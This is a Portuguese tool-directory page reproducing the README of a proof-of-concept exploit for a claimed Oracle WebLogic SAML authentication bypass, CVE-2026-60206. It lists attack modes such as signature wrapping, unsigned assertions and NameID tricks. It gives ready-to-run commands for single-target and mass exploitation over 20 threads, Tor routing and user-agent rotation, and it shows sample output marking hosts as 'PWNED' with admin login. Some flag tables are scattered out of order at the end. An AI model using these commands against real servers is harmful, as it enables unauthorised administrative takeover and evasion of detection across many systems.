Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-60206 — Technical analysis and Proof-of-Concept for CVE-2026-60206, a critical Oracle WebLogic Server SAML authentication bypass vulnerability. | Kitploit
Ferramentas/GitHubGitHub/debajyoti0-0/cve-2026-60206
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthentication
GitHubdebajyoti0-0/cve-2026-60206

CVE-2026-60206

Technical analysis and Proof-of-Concept for CVE-2026-60206, a critical Oracle WebLogic Server SAML authentication bypass vulnerability.

Ver Repositório
há 26 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-60206 – Prova de Conceito de Bypass de Autenticação SAML do Oracle WebLogic Server

Este repositório fornece uma prova de conceito de exploração para CVE‑2026‑60206, uma vulnerabilidade crítica de bypass de autenticação na implementação SAML do Oracle WebLogic Server. A falha permite que um atacante remoto com privilégios baixos comprometa completamente o servidor forjando asserções SAML.

CVSS

⚠️ Aviso: Esta ferramenta destina-se apenas a pesquisas e testes de segurança autorizados. Utilize-a apenas contra sistemas que possui ou para os quais tem permissão explícita para testar. Os autores não assumem qualquer responsabilidade por uso indevido.

CVE-2026-60206 Logo

🔥 Visão Geral da Vulnerabilidade

CVE-2026-60206 afeta o componente Core do Oracle WebLogic Server. A vulnerabilidade decorre de um tratamento inadequado de autenticação na implementação do protocolo SAML. Múltiplos vetores de ataque — como XML Signature Wrapping (XSW), aceitação de asserção não assinada, manipulação de NameID e bypass de audiência/condições — permitem que um atacante se passe por utilizadores arbitrários (ex.: weblogic) e ganhe acesso administrativo.

Versões Afetadas:

  • 12.2.1.4.0
  • 14.1.1.0.0
  • 14.1.2.0.0
  • 15.1.1.0.0

O PoC implementa os seguintes vetores de ataque:

  • XML Signature Wrapping (XSW) – manipulação estrutural para fazer o processador SAML aceitar uma asserção não assinada.
  • Injeção de Asserção Não Assinada – criar uma resposta SAML completamente não assinada (se WantAssertionsSigned não estiver ativado).
  • Manipulação de NameID – confundir o mapeador de identidade através de comentários XML, espaços em branco ou confusão de formato.
  • Bypass de Restrição de Audiência – remover ou modificar AudienceRestriction para ampliar o âmbito.
  • Bypass de Condições/Tempo – manipular NotBefore/NotOnOrAfter para ignorar verificações de validade.
  • Ataque Combinado – XSW + asserção interna não assinada + manipulação de NameID (maior probabilidade de sucesso).
  • Replay – repetir uma resposta SAML capturada com destino/recipiente modificado.

✨ Funcionalidades

  • Múltiplos modos de ataque – selecione entre all, unsigned, xsw, nameid, audience, conditions, combo ou replay.
  • Varredura em massa – deteção concorrente e exploração opcional em muitos alvos (via -l).
  • Deteção de versão – identificar com precisão a versão do WebLogic através de cabeçalhos, páginas de erro e WSDL.
  • Sondagem de endpoints SAML – descobrir automaticamente endpoints SAML ACS, metadados e iniciados por SP.
  • Suporte a Tor – encaminhar tráfego através do Tor (SOCKS5/HTTP/SOCKS4) para anonimato.
  • Replay de requisição HTTP bruta – enviar requisições HTTP brutas arbitrárias a partir de um ficheiro (-r).
  • Suporte a HTTP/2 – usa automaticamente httpx se instalado, caso contrário recorre a requests (HTTP/1.1).

📦 Instalação

root@kitploit:~
git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

Necessário: requests, urllib3

Opcional (melhora a funcionalidade):

  • httpx – para suporte a HTTP/2
  • lxml – para análise SAML avançada
  • signxml, cryptography – para tratamento de assinaturas (não necessário para exploração)

🚀 Utilização

Alvo único – apenas deteção

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect

Alvo único – executar todos os vetores de ataque

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic

Alvo único – modo de ataque específico

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin

Varredura em massa – detetar versões a partir de ficheiro

root@kitploit:~
python CVE-2026-60206.py -l targets.txt -o results.json

Varredura em massa – detetar + explorar

root@kitploit:~
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20

Repetir uma resposta SAML capturada

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml

Usar Tor e verificar conectividade

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor

Enviar uma requisição HTTP bruta a partir de ficheiro

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST

Verificação rápida de vulnerabilidade (não exploratória)

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c

⚙️ Referência de Flags

Opções:

Alvo:

BandeiraDescrição
-t, --target TARGETURL de um único alvo (ex.: https://host:7002).
-l, --list LISTFicheiro de lista de alvos para varredura em massa, ou URL único.

Opções de Requisição:

Configuração do Ataque:

Varredura em Massa (com -l):

BandeiraDescrição
--exploitTestar asserção SAML não assinada (padrão: apenas deteção).
-T, --threads THREADSThreads concorrentes (padrão: 10).

Saída:

BandeiraDescrição
-v, --verboseAumentar verbosidade (saída de depuração).
-q, --quiet

🧪 Modos em Detalhe

detect

Realiza deteção de versão e sondagem de endpoint SAML. Nenhum ataque é lançado.

unsigned

Injeta uma asserção SAML completamente não assinada. Se o alvo não impuser WantAssertionsSigned, isto ignora completamente a autenticação.

Variantes: unsigned (padrão), unsigned_stripped (remove todas as referências de assinatura).

xsw (XML Signature Wrapping)

Coloca uma asserção maliciosa não assinada antes (ou envolvendo) uma asserção assinada válida. O processador SAML pode selecionar a primeira asserção enquanto o validador de assinaturas verifica a assinada.

Variantes: xsw1 (simples prefixo), xsw2 (mesmo ID do original), xsw3 (wrapper aninhado), xsw4 (irmão).

nameid

Manipula o campo NameID para confundir o mapeador de identidade do WebLogic, permitindo a personificação de um utilizador diferente.

Variantes: comment_injection, whitespace, format_confusion, xpath_injection.

audience

Ignora as verificações de AudienceRestriction removendo ou modificando o elemento de audiência.

Variantes: remove_audience, wildcard_audience, extra_audience.

conditions

Ignora restrições baseadas em tempo (ex.: NotBefore, NotOnOrAfter).

Variantes: future_timestamp, expired_timestamp, remove_conditions, infinite_validity.

combo

Combina XSW, asserção não assinada e manipulação de NameID numa única carga útil – o vetor mais provável para comprometimento total.

Variantes: combo_full (com injeção de comentário), combo_stealth (com nova linha).

replay

Repete uma resposta SAML previamente capturada, opcionalmente modificando o destino ou removendo restrições de audiência.

Variantes: replay_modified (ajusta Destination/Recipient), replay_cross_sp (remove restrições de audiência).

📝 Exemplo de Fluxo de Trabalho (Exploração de Alvo Único)

root@kitploit:~
$ python CVE-2026-60206.py -t https://192.168.1.100:7002 -u weblogic --mode combo

  ╔══════════════════════════════════════════════════════════════════════╗
  ║       CVE-2026-60206 — WebLogic SAML Authentication Bypass PoC       ║
  ║         Oracle WebLogic Server Core | CVSS 9.9 | CWE-287             ║
  ╚══════════════════════════════════════════════════════════════════════╝

🔍 Detecting WebLogic version and SAML configuration...
  Detected WebLogic version: 12.2.1.4.0
  ⚠️  Version 12.2.1.4.0 is IN SCOPE for CVE-2026-60206!
  Found SAML metadata: /saml2/sp/metadata
  Found SAML ACS: /saml2/sp/acs (HTTP 200)

============================================================
🚀 Starting comprehensive SAML attack suite
   Target: https://192.168.1.100:7002
   Target User: weblogic
============================================================

── Attack 1/2 ──
🎯 [combo/combo_full] Launching combined attack for: weblogic
✅ [combo/combo_full] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

── Attack 2/2 ──
🎯 [combo/combo_stealth] Launching combined attack for: weblogic
✅ [combo/combo_stealth] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

============================================================
📊 Results: 2/2 attack vectors succeeded
============================================================

 EXPLOIT SUCCESSFUL! 2 attack(s) bypassed authentication.
   - [combo/combo_full] → logged in as 'weblogic' via /saml2/sp/acs
   - [combo/combo_stealth] → logged in as 'weblogic' via /saml2/sp/acs
📄 Report saved: logs/report_20260725_123456.json

📝 Exemplo de Fluxo de Trabalho (Varredura em Massa)

root@kitploit:~
$ python CVE-2026-60206.py -l targets.txt --exploit -o scan_results.csv --threads 10

============================================================
  CVE-2026-60206 Mass Scanner
  Targets: 50
  Threads: 10
  Mode:    Exploit
============================================================

  [10/50] 20.0% | Vuln:3 | Pwned:1 | 1.2 tgt/s  
  [!] VULN: https://10.0.0.5:7002 (12.2.1.4.0)
  [!!] PWNED: https://10.0.0.5:7002 - logged in as weblogic
  ... (continues) ...

============================================================
  SCAN SUMMARY
============================================================
  Total targets:   50
  Reachable:       45
  WebLogic:        12
  Vuln version:    8
  Exploited:       3
  Duration:        42.5s
============================================================

  [!!] SUCCESSFULLY EXPLOITED:
    https://10.0.0.5:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.10:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.15:7002 → weblogic via /saml2/sp/acs

  [!] VULNERABLE VERSIONS (not yet exploited):
    https://10.0.0.20:7002 (14.1.1.0.0)
    https://10.0.0.25:7002 (15.1.1.0.0)
    ... (truncated)

🛠️ Construindo um Ambiente de Teste Vulnerável

Para testar este PoC com segurança, configure um WebLogic Server com SAML ativado e uma das versões afetadas. Por exemplo, pode usar Docker:

root@kitploit:~
# Example (simplified – use official Oracle WebLogic images with SAML configuration)
docker run -p 7002:7002 container-registry.oracle.com/middleware/weblogic:12.2.1.4
# Then configure SAML via WebLogic console or scripts

A configuração SAML deve incluir pelo menos um Service Provider SAML 2.0 com um endpoint ACS (ex.: /saml2/sp/acs) e metadados publicados.

🔗 Referências

  • Oracle July 2026 Critical Patch Update Advisory
  • CVE-2026-60206 Detail – NIST NVD
  • CWE-287: Improper Authentication
  • SAML 2.0 Security Analysis – XML Signature Wrapping

📜 Licença

Este projeto está licenciado sob a Licença GNU v3.0 – consulte o ficheiro LICENSE para mais detalhes.

🤝 Contribuindo

Issues e pull requests são bem-vindos. Por favor, certifique-se de que as suas contribuições aderem às mesmas diretrizes de uso ético.

Lembre-se: Obtenha sempre autorização adequada antes de testar qualquer ferramenta de segurança. Seja ético!

Baixar ferramenta
  • Rotação de User-Agent – usar um User-Agent aleatório ou personalizado.
  • Suporte a proxy – enviar todas as requisições através de um proxy HTTP/SOCKS.
  • Personalização de requisições – definir timeouts, repetições, atrasos, desativar redirecionamentos e repetir com base em padrão regex.
  • Salvamento de payloads – guardar payloads SAML gerados em disco (--save-payloads).
  • Verificação de vulnerabilidade (-c / --check) – determinar rapidamente se um alvo é vulnerável (não exploratório).
  • Saída de relatório JSON/CSV – resultados estruturados para varreduras em massa.
  • Registo verbose – saída detalhada de depuração com consola colorida.
  • BandeiraDescrição
    -h, --helpMostrar mensagem de ajuda e sair.
    --proxy PROXYURL do proxy (substituído por --tor se utilizado).
    --no-verifyDesativar verificação de certificado SSL.
    --cookie COOKIECookie(s) de sessão (ex.: name=value; name2=value2).
    --auth AUTHCredenciais de autenticação básica (USER:PASS).
    -f, --file FILEAlias para --list.
    BandeiraDescrição
    -r, --requestfile REQUESTFILECarregar requisição HTTP bruta a partir de ficheiro (substitui ataques SAML).
    --method METHODMétodo HTTP a usar (para requisição bruta ou requisição única; padrão: GET).
    --random-agentUsar um User-Agent aleatório da lista interna.
    -A, --user-agent USER_AGENTValor personalizado do cabeçalho User-Agent.
    --torUsar rede de anonimato Tor (SOCKS5 por padrão).
    --tor-port TOR_PORTPorta do proxy Tor (padrão: 9050).
    --tor-type {HTTP,SOCKS4,SOCKS5}Tipo de proxy Tor (padrão: SOCKS5).
    --check-torVerificar se o Tor está a ser usado corretamente (sai com veredito).
    --delay DELAYAtraso em segundos entre cada requisição.
    --timeout TIMEOUTTimeout em segundos (padrão: 30).
    --retries RETRIESNúmero de repetições em caso de timeout/erros (padrão: 3).
    --retry-on RETRY_ONRepetir requisição se o conteúdo da resposta corresponder a uma regex (ex.: 'captcha').
    -dr, --disable-redirectsDesativar seguimento de redirecionamentos HTTP.
    BandeiraDescrição
    -m, --mode {all,detect,unsigned,xsw,nameid,audience,conditions,combo,replay}Modo de ataque (padrão: all).
    --detectDetetar versão do WebLogic e configuração SAML apenas (sem ataque).
    -c, --checkVerificação rápida de vulnerabilidade (apenas deteção, sai com veredito).
    -u, --user USERUtilizador alvo a personificar (padrão: weblogic).
    --groups GROUPSGrupos a incluir na asserção SAML (padrão: Administrators,Monitors).
    --issuer ISSUERID da Entidade Emissora SAML.
    --audience AUDIENCEID da Entidade Audiência SAML.
    --relay-state RELAY_STATEParâmetro RelayState para POST SAML.
    --base64Codificar a resposta SAML em Base64 no POST.
    --extra-attrs [NAME=VALUE ...]Atributos SAML extra (ex.: role=admin).
    --replay-file REPLAY_FILECaminho para a resposta SAML capturada para replay.
    --save-payloadsGuardar payloads SAML gerados em ./payloads/.
    --continue-on-successContinuar a testar após um ataque bem-sucedido.
    Suprimir saída não essencial.
    --list-modesListar todos os modos de ataque com descrições e sair.
    -o, --output OUTPUTEscrever relatório JSON ou CSV para ficheiro.